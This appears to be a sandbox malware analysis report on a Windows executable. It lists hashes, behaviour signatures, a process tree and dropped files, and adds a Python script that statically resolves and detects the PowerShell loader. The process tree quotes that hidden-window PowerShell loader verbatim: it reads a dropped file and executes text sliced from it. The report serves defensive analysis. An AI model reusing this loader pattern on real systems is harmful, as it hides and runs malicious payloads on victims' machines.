Analysis

  • max time kernel
    19s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    03/02/2025, 15:07

General

  • Target

    rCRW51901537.exe

  • Size

    903KB

  • MD5

    5e61c03c8a975e86e792bfa3f671ba64

  • SHA1

    63ce77c1135445358dfae6f106e964546fdc025d

  • SHA256

    ea08fba535ff837c953efbd7e664aa22bec2f4784d2d66e3dea3b357b705d973

  • SHA512

    fe51514c8b8563b6e32a4369fab1d3f5af840768cdad3cd5887fbde5a9e47ac9edec446e2776fa3f998d71977fe8034e1da5069684389f6073ce78d910dedb20

  • SSDEEP

    24576:Xiln2+hjdsfdMks3KgZ32Z8ImwIQSEab+W0Ab:Xonzds1MkkKBZ8I1RSTb+m

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with a hidden display window.

  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\rCRW51901537.exe
    "C:\Users\Admin\AppData\Local\Temp\rCRW51901537.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:908
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Ideographic=gc -raw 'C:\Users\Admin\AppData\Local\Discernibly\lagringsformers\kasusbjning\Degaardenes179\Bloter.Ino';$Reigned=$Ideographic.SubString(70797,3);.$Reigned($Ideographic) "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2824
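
The PowerShell command line above is a small loader: it reads the dropped file as one string, takes three characters at offset 70797, and dot-invokes whatever those three characters name, passing the whole file as the argument. The three characters are not on this page, so the next stage cannot be recovered from the report alone. The script below is an added example (written for this report, not part of Triage or of the sample) that resolves this pattern statically, without running anything: it parses the command line for the path, offset and length, decodes a copy of the file the way Windows PowerShell's `Get-Content -Raw` would (ANSI/cp1252 is assumed, since the loader runs from `SysWOW64\WindowsPowerShell\v1.0`), extracts the token, and returns the file text as the candidate next stage when the token is an `Invoke-Expression` alias. A detection helper flags command lines that combine a hidden window, a `SubString(n,m)` slice and dot-invocation of a variable. The sample blob is constructed for the demonstration, with `iex` placed at the offset; the real `Bloter.Ino` contents are not known from the page.

```python
"""Static resolver for a 'gc -raw / SubString / .$var($buf)' PowerShell loader.
Added example for this report; not code from Triage or from the sample."""
import re

# Command line of PID 2824 exactly as recorded in the report.
STAGER_CMDLINE = r'''powershell.exe -windowstyle hidden "$Ideographic=gc -raw 'C:\Users\Admin\AppData\Local\Discernibly\lagringsformers\kasusbjning\Degaardenes179\Bloter.Ino';$Reigned=$Ideographic.SubString(70797,3);.$Reigned($Ideographic) "'''

# $buf = gc -raw '<path>'; $cmd = $buf.SubString(off,len); .$cmd($buf)
STAGER_RE = re.compile(
    r"\$(?P<buf>\w+)\s*=\s*gc\s+-raw\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<cmd>\w+)\s*=\s*\$(?P=buf)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)\s*;"
    r"\s*\.\$(?P=cmd)\(\$(?P=buf)\)",
    re.IGNORECASE,
)

# Detection pieces: hidden window, a SubString slice, and dot/call-operator
# invocation of a variable (".$x(" or "&$x(").
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
SUBSTRING_RE = re.compile(r"\.SubString\(\s*\d+\s*,\s*\d+\s*\)", re.IGNORECASE)
DOT_INVOKE_VAR_RE = re.compile(r"(?:^|[;\s\"])[.&]\s*\$\w+\s*\(")

# Names the three-character token would have to be for the file itself to be
# the next stage. Any other value is reported but not treated as a stage.
INVOKE_ALIASES = {"iex", "invoke-expression"}


def parse_stager(cmdline: str):
    """Return path/offset/length/variable names, or None if the shape differs."""
    m = STAGER_RE.search(cmdline)
    if not m:
        return None
    return {
        "path": m.group("path"),
        "offset": int(m.group("off")),
        "length": int(m.group("len")),
        "buf_var": m.group("buf"),
        "cmd_var": m.group("cmd"),
    }


def resolve_stage(cmdline: str, blob: bytes, encoding: str = "cp1252"):
    """Emulate the SubString step on a copy of the dropped file, never executing it.

    Assumption: Windows PowerShell 5.1 reads the file with the ANSI code page,
    so every byte becomes exactly one character and the SubString character
    offset equals the byte offset. PowerShell 7 would default to UTF-8.
    Returns (token, next_stage_text_or_None).
    """
    info = parse_stager(cmdline)
    if info is None:
        raise ValueError("command line does not match the loader pattern")
    text = blob.decode(encoding, errors="replace")
    off, ln = info["offset"], info["length"]
    if off + ln > len(text):
        raise ValueError(f"offset {off}+{ln} is beyond the decoded length {len(text)}")
    token = text[off:off + ln]
    next_stage = text if token.lower() in INVOKE_ALIASES else None
    return token, next_stage


def is_stager_cmdline(cmdline: str) -> bool:
    """Heuristic: hidden window + SubString slice + dot-invocation of a variable."""
    return bool(
        HIDDEN_RE.search(cmdline)
        and SUBSTRING_RE.search(cmdline)
        and DOT_INVOKE_VAR_RE.search(cmdline)
    )


def build_sample_blob(offset: int, token: str = "iex") -> bytes:
    """Constructed stand-in for Bloter.Ino: filler with the token at `offset`."""
    head = b"# constructed filler, not the real Bloter.Ino\n"
    if offset <= len(head):
        raise ValueError("offset too small for the constructed header")
    pad = b"#" * (offset - len(head))
    tail = b"\nWrite-Host 'stage two would run here'\n"
    return head + pad + token.encode("ascii") + tail


if __name__ == "__main__":
    info = parse_stager(STAGER_CMDLINE)
    print("loader parameters:", info)
    token, stage = resolve_stage(STAGER_CMDLINE, build_sample_blob(info["offset"]))
    print("token at offset:", repr(token))
    print("next stage recovered:", stage is not None, "suspicious:", is_stager_cmdline(STAGER_CMDLINE))
```

On a real triage, pass the bytes of the dropped `Bloter.Ino` to `resolve_stage`; if the token resolves to `iex`, the returned text is the second-stage script and can be read or further deobfuscated rather than executed. If the token is something else, the loader is calling a function or alias defined elsewhere and the output tells you what to look for next.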

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Discernibly\lagringsformers\kasusbjning\Degaardenes179\barricade.jpg

    Filesize

    17KB

    MD5

    ff66a9c96e345d70d38cc3a3abb6aaf6

    SHA1

    4983d3dc65bb245e9ba5b5777a75faccc2b76459

    SHA256

    03c46abaa1a37f0998ebb5da7ee3cad386037de6821958f1c7517ed10f7a846a

    SHA512

    36f25fcd0af78503a951f953bb65632735148902f5cf59aedfee2b74d649e57498f8ac047046448939aeed16539895746621fa91b489061be1219746921696f3

  • \Users\Admin\AppData\Local\Temp\nsj7CDE.tmp\nsExec.dll

    Filesize

    6KB

    MD5

    b55f7f1b17c39018910c23108f929082

    SHA1

    1601f1cc0d0d6bcf35799b7cd15550cd01556172

    SHA256

    c4c6fe032f3cd8b31528d7b99661f85ee22cb78746aee98ec568431d4f5043f7

    SHA512

    d652f2b09396ef7b9181996c4700b25840ceaa6c1c10080a55ce3db4c25d8d85f00a21e747f9d14a3374be4cdd4ea829a18d7de9b27b13b5e304447f3e9268fa

  • memory/2824-27-0x0000000074261000-0x0000000074262000-memory.dmp

    Filesize

    4KB

  • memory/2824-29-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/2824-28-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/2824-30-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/2824-31-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB

  • memory/2824-32-0x0000000074260000-0x000000007480B000-memory.dmp

    Filesize

    5.7MB